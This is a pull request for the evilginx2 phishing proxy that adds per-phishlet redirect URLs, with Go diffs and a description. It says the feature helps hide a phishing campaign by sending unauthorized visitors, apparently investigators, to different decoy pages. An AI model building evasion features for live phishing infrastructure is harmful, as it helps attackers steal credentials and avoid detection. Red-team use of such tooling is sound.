### PR TITLE
Feature: Phishlet-Specific redirect URL

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -1038,10 +1038,37 @@ func (p *HttpProxy) blockRequest(req *http.Request) (*http.Request, *http.Respon
 		redirect_url := p.cfg.general.RedirectUrl
 		phishlet_redirect_url := p.getPhishletByPhishHost(req.Host).redirect_url
 
+		log.Warning("req.Host: [%s]", req.Host)
+		log.Warning("redirect url: [%s]", redirect_url)
+		log.Warning("phish_redir_url: [%s]", phishlet_redirect_url)
+		log.Warning("phishlet_domains: [%s]", p.getPhishletByPhishHost(req.Host).domains)
+		log.Warning("phishlet_proxy_hosts: [%s]", p.getPhishletByPhishHost(req.Host).proxyHosts)
+		log.Warning("phishlet_login_url: [%s]", p.getPhishletByPhishHost(req.Host).GetLoginUrl())
+		log.Warning("phishlet_phish_hosts: [%s]", p.getPhishletByPhishHost(req.Host).GetPhishHosts(false))
+
 		if len(phishlet_redirect_url) > 0 {
-			redirect_url = phishlet_redirect_url
+			match := false
+			for _, host := range p.getPhishletByPhishHost(req.Host).GetPhishHosts(false) {
+				if strings.Contains(req.Host, host) {
+					match = true
+					break
+				}
+			}
+			log.Warning("req contains phish redirect rul?: [%s]", match)
+			if match {
+				log.Warning("phishlet redirect override: [%s]", phishlet_redirect_url)
+				redirect_url = phishlet_redirect_url
+			}
 		}
-		
+
+		//redirect_url = phishlet_redirect_url
+
+		//if (len(phishlet_redirect_url) > 0) && (strings.Contains(p.getPhishletByPhishHost(req.Host).GetLoginUrl(), req.Host)) {
+		//	log.Warning("req contains phish redirect rul?: [%s]", strings.Contains(p.getPhishletByPhishHost(req.Host).GetLoginUrl(), req.Host))
+		//	redirect_url = phishlet_redirect_url
+		//	log.Warning("phishlet redirect override: [%s]", phishlet_redirect_url)
+		//}
+
 		resp := goproxy.NewResponse(req, "text/html", http.StatusFound, "")
 		if resp != nil {
 			resp.Header.Add("Location", redirect_url)

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -1034,7 +1034,14 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 func (p *HttpProxy) blockRequest(req *http.Request) (*http.Request, *http.Response) {
 	if len(p.cfg.general.RedirectUrl) > 0 {
+
 		redirect_url := p.cfg.general.RedirectUrl
+		phishlet_redirect_url := p.getPhishletByPhishHost(req.Host).redirect_url
+
+		if len(phishlet_redirect_url) > 0 {
+			redirect_url = phishlet_redirect_url
+		}
+		
 		resp := goproxy.NewResponse(req, "text/html", http.StatusFound, "")
 		if resp != nil {
 			resp.Header.Add("Location", redirect_url)

--- a/core/phishlet.go
+++ b/core/phishlet.go
@@ -120,6 +120,7 @@ type Phishlet struct {
 	js_inject        []JsInject
 	customParams     map[string]string
 	isTemplate       bool
+	redirect_url	 string
 }
 
 type ConfigParam struct {
@@ -211,6 +212,7 @@ type ConfigPhishlet struct {
 	LandingPath *[]string          `mapstructure:"landing_path"`
 	LoginItem   *ConfigLogin       `mapstructure:"login"`
 	JsInject    *[]ConfigJsInject  `mapstructure:"js_inject"`
+	RedirectUrl string             `mapstructure:"redirect_url"`
 }
 
 func NewPhishlet(site string, path string, customParams *map[string]string, cfg *Config) (*Phishlet, error) {

--- a/core/phishlet.go
+++ b/core/phishlet.go
@@ -120,7 +120,7 @@ type Phishlet struct {
 	js_inject        []JsInject
 	customParams     map[string]string
 	isTemplate       bool
-	redirect_url	 string
+	redirect_url     string
 }
 
 type ConfigParam struct {
@@ -247,6 +247,7 @@ func (p *Phishlet) Clear() {
 	p.forcePost = []ForcePost{}
 	p.customParams = make(map[string]string)
 	p.isTemplate = false
+	p.redirect_url = ""
 }
 
 func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[string]string) error {
@@ -706,7 +707,13 @@ func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[stri
 			p.landing_path[n] = p.paramVal(p.landing_path[n])
 		}
 	}
+
+	if len(fp.RedirectUrl) > 0 {
+		p.redirect_url = fp.RedirectUrl
+	}
+
 	return nil
+
 }
 
 func (p *Phishlet) GetPhishHosts(use_wildcards bool) []string {

--- a/phishlets/example.yaml
+++ b/phishlets/example.yaml
@@ -18,3 +18,4 @@ credentials:
 login:
   domain: 'academy.breakdev.org'
   path: '/evilginx-mastery'
+redirect_url: 'example.com'


### PR DESCRIPTION
This feature adds the ability to define phishlet-specific redirect URLs in the phishlet's .yaml file. 
If a phishlet-specific redirect URL is available for the current request's host it will supersede the global redirect URL.

Redirect URLs continue to work as normal otherwise.

When running multiple campaigns or phishlets it may be useful to have the ability to present different redirect pages for unauthorized requests. Presenting different redirect_url pages may help with limiting the association of the redirect_url page for one phishlet with the overall campaign.

This feature was built into the core/http_proxy.go/blockRequest() function as to modify as little as possible.

The core/phishlets.go file was modified to accept a new variable from the phishlet .yaml configuration.

- struct Phishlet
- struct ConfigPhishlet
- func Clear
- func LoadFromFile

The phishlets/example.yaml was also modified to include "example.com" as the example for the redirect_url parameter.

Linked to fork feature request #915

Test Cases:

![image](https://github.com/aalex954/evilginx2-development/assets/6628565/a5e1d3f0-8063-4ab2-b62e-3b1ba369d54a)
